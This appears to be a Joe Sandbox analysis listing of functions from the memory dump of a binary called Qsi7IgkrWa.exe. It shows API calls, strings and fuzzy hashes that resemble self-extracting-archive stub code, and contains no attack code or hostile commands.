Instruction Fuzzy Hash: BAF01232504242FB8660DB68E4C5C26FBEAEA44715B541CAFF118DB792EF71FC80DA54

Function 00BC1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BC1FE5
_wcslen.LIBCMT ref: 00BC1FF6
_wcslen.LIBCMT ref: 00BC2006
_wcslen.LIBCMT ref: 00BC2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00BBB371,?,?,00000000,?,?,?), ref: 00BC202F

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 12d2b3a4c653d5034a420e55f3ee6a5dc29c2676cff0dd6f9007c9a67f18fb6a
Instruction ID: 909e537dcd520491a5790ee03eb446ceadfba192e95667b8e2f945cc6c128bec
Opcode Fuzzy Hash: 12d2b3a4c653d5034a420e55f3ee6a5dc29c2676cff0dd6f9007c9a67f18fb6a
Instruction Fuzzy Hash: B4F06D32008014BBCF261F50EC49E8A7FA6EB40B60B11808AF61A5B0A3DB729661D7A0

Function 00BD8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BD891E

Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4

_free.LIBCMT ref: 00BD8930
_free.LIBCMT ref: 00BD8943
_free.LIBCMT ref: 00BD8954
_free.LIBCMT ref: 00BD8965

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 69bb806f907d4cbeb2e75bfdf294340069388254cd9a41788e5cd51bba8a3636
Instruction ID: b962c928868c1522abdfdd592fae5280f7ff0464227af9390fed368f75d74b00
Opcode Fuzzy Hash: 69bb806f907d4cbeb2e75bfdf294340069388254cd9a41788e5cd51bba8a3636
Instruction Fuzzy Hash: 13F09A7D800126AB86426F24FC0279D7BE2F72A721300429BF0645B3F5EF3689618B80

Function 00BC15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BC17BC
_swprintf.LIBCMT ref: 00BC186B

Strings

%s: %s, xrefs: 00BC17CB
%ls, xrefs: 00BC1641, 00BC1657

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 5891bf773ac0058aa475f51c783ec91c60cde0bc47c0276320c8363d4994526c
Instruction ID: ece38a2ef0846390b618e5d14b342bc23989916ad3782124225c5bc1cbc3948a
Opcode Fuzzy Hash: 5891bf773ac0058aa475f51c783ec91c60cde0bc47c0276320c8363d4994526c
Instruction Fuzzy Hash: F051DA7524C300F6E6111A9C8D86F7572E5AB07B04F248DDFF397744E3CAA2A810675B

Function 00BD7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Qsi7IgkrWa.exe,00000104), ref: 00BD7FAE
_free.LIBCMT ref: 00BD8079
_free.LIBCMT ref: 00BD8083

Strings

C:\Users\user\Desktop\Qsi7IgkrWa.exe, xrefs: 00BD7FA5, 00BD7FAC, 00BD7FDB, 00BD8013

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Qsi7IgkrWa.exe
API String ID: 2506810119-3654394228
Opcode ID: c89f942280a413a52010920396ecbef488f41e31cee41aa183695c796b21c51c
Instruction ID: 2843d12745860c750b28de4e4889a667048269f58a8ab64cb89e1a438971630a
Opcode Fuzzy Hash: c89f942280a413a52010920396ecbef488f41e31cee41aa183695c796b21c51c
Instruction Fuzzy Hash: F0318F75A00258AFDB25DF959885E9EFBFCEF85311F1040EBF50497351EA708A448B91

Function 00BD31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BD31FB
_abort.LIBCMT ref: 00BD3306

Strings

MOC, xrefs: 00BD320D
RCC, xrefs: 00BD3215

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: bb263ea094eea0898f4f50f0d8dcc932287f0203661023fa07eb66a7089c1b6c
Instruction ID: 71e494985842a3612a555c937f07511b3de601506d0d9e22c0fe33799df6fe0e
Opcode Fuzzy Hash: bb263ea094eea0898f4f50f0d8dcc932287f0203661023fa07eb66a7089c1b6c
Instruction Fuzzy Hash: BC415971D00209AFCF15DF98CD81AAEBBF5FF48704F18809AF90467212E335AA50DB55

Function 00BB7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB7406

Part of subcall function 00BB3BBA: __EH_prolog.LIBCMT ref: 00BB3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00BB74CD

Part of subcall function 00BB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BB7AAB
Part of subcall function 00BB7A9C: GetLastError.KERNEL32 ref: 00BB7AF1
Part of subcall function 00BB7A9C: CloseHandle.KERNEL32(?), ref: 00BB7B00

Strings

SeSecurityPrivilege, xrefs: 00BB744B
SeRestorePrivilege, xrefs: 00BB7460

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 8222cc89c780aeed46e96da1d6a04d2b6271dac1290575d90ef45b73e5823f89
Instruction ID: 8ba2a483050b40c8324d12cd04134d0f12a6e355420c7f7af09062c97f67967d
Opcode Fuzzy Hash: 8222cc89c780aeed46e96da1d6a04d2b6271dac1290575d90ef45b73e5823f89
Instruction Fuzzy Hash: 3E319271D44248AFDF21EBA48C45FFE7BE9EB59304F044499F405A7292DFB48A44CB61

Function 00BCAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370

EndDialog.USER32(?,00000001), ref: 00BCAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00BCADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BCADC2

Strings

ASKNEXTVOL, xrefs: 00BCAD28

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: a70f896be8bbcf01cc6e55c5300f8230522fbf9ddef40d8a739381336a4d3f6a
Instruction ID: 3b40beb83f48c417ec4e3d768964cb4159f14fc5739ccfde9c69eb7aef598220
Opcode Fuzzy Hash: a70f896be8bbcf01cc6e55c5300f8230522fbf9ddef40d8a739381336a4d3f6a
Instruction Fuzzy Hash: FC11B132340204BFD711DF689C49FEA3BE9FB4B74AF0444A4F742EA4A0CB6199059766

Function 00BBD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00BBD954
_strncpy.LIBCMT ref: 00BBD99A

Part of subcall function 00BC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BF1030,00000200,00BBD928,00000000,?,00000050,00BF1030), ref: 00BC1DC4

Strings

$%s, xrefs: 00BBD949
@%s, xrefs: 00BBD93E

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 4cc53386f566a3a6fa050ab431df9bd774054965fa92e89532b17be0cb3ce05b
Instruction ID: 681ca2e643d06359b7dc1c0cdf6a42a96fd7b4afb30ba61d6c41e72e2da39143
Opcode Fuzzy Hash: 4cc53386f566a3a6fa050ab431df9bd774054965fa92e89532b17be0cb3ce05b
Instruction Fuzzy Hash: BE215E72540248ABDB21EEA4CC45FEE7BE8EF05704F0405A6F950961A2F7B5D648CB51

Function 00BC0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00BBAC5A,00000008,?,00000000,?,00BBD22D,?,00000000), ref: 00BC0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00BBAC5A,00000008,?,00000000,?,00BBD22D,?,00000000), ref: 00BC0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00BBAC5A,00000008,?,00000000,?,00BBD22D,?,00000000), ref: 00BC0E9F

Strings

Thread pool initialization failed., xrefs: 00BC0EB7

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 228c338dc6d81d57c03094d7e29af8c05c66039ce036a6533b2707a61e56229e
Instruction ID: 64f17b18bd162a6dc2a23607fde6c3e421c3564e23539eb9865c575cb60cbc48
Opcode Fuzzy Hash: 228c338dc6d81d57c03094d7e29af8c05c66039ce036a6533b2707a61e56229e
Instruction Fuzzy Hash: E8118FB1A84709DBC3215F6ADC84AA7FBECEB54744F144C6EE1DA87201DAB199408B54

Function 00BCB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370

EndDialog.USER32(?,00000001), ref: 00BCB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00BCB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00BCB304

Strings

GETPASSWORD1, xrefs: 00BCB289

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 8159f2df2a113df6d83a2cfdff4d9e89b796aa9bcd5f88af19dc6cb16d4e1346
Instruction ID: 5d9be1bd58e8af65b5e6c3a9287c414e3bcd808e091ab152eba9436822f75ef6
Opcode Fuzzy Hash: 8159f2df2a113df6d83a2cfdff4d9e89b796aa9bcd5f88af19dc6cb16d4e1346
Instruction Fuzzy Hash: 0111C83290015577DF219A64AC4AFFF3BECEF5A704F1000A9FA46F61C0C7A49A459765

Function 00BCDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00BCDD1C, 00BCDD50
RENAMEDLG, xrefs: 00BCDD31

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 3bfc919058bf4bf97d9ce58bba0ff7c9f8b7a9a78334856530dd09133ef2d826
Instruction ID: 0a71f319ae9ca0a4d62fbb5e19cab4fee3a9cdca0541fd8b07313402226018e6
Opcode Fuzzy Hash: 3bfc919058bf4bf97d9ce58bba0ff7c9f8b7a9a78334856530dd09133ef2d826
Instruction Fuzzy Hash: EF01717AA04285AFDB118F69FC44FAA7BE8F709354B00487EF90687330CB319850DBA0

Function 00BCDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00BCDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BCDC30

Strings

sfxpar, xrefs: 00BCDC2B
sfxcmd, xrefs: 00BCDBEF

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 59325d1413f07d0430b621f564ba5d2c11dd4b15846ca7429f44e413ffdce86f
Instruction ID: 0fe196aadef2f332c2c2a29529064ab690a169280fc6359ac6ec76982a2fbc65
Opcode Fuzzy Hash: 59325d1413f07d0430b621f564ba5d2c11dd4b15846ca7429f44e413ffdce86f
Instruction Fuzzy Hash: 50F0EC72405224E7CB202F958C4AFFB37D8EF04B81B0404EDBD85AB151D7B08980D6B1

Function 00BD9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00BD9AA9
__alldvrm.LIBCMT ref: 00BD9CAA
__alldvrm.LIBCMT ref: 00BD9CCC

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: b35ad4acbf35f8634e3c4ef936f7e0413b2e511171a7659f380e2102d40cef16
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: 3AA13372A146869FEB258F68C8817AEFBE5EF51310F2841EFE5959B381E2388941C750

Function 00BBA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00BB7F69,?,?,?), ref: 00BBA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00BB7F69,?), ref: 00BBA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00BB7F69,?,?,?,?,?,?,?), ref: 00BBA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00BB7F69,?,?,?,?,?,?,?,?,?,?), ref: 00BBA4C6

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 8d09aaeec1e069e8c98f406e4587f7b1a7bc5c0470ff592018de1730c8469812
Instruction ID: 3e74967c9722fdedde07585871c65e3df407708942b63bd90dd23da89d028580
Opcode Fuzzy Hash: 8d09aaeec1e069e8c98f406e4587f7b1a7bc5c0470ff592018de1730c8469812
Instruction Fuzzy Hash: A341CF31648381ABE731DF24DC89FEEBBE8EB85700F04099DB5D197281D6E49A48DB53

Function 00BB1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BB112B
_wcslen.LIBCMT ref: 00BB1153
_wcslen.LIBCMT ref: 00BB1182
_wcslen.LIBCMT ref: 00BB11A9

Memory Dump Source

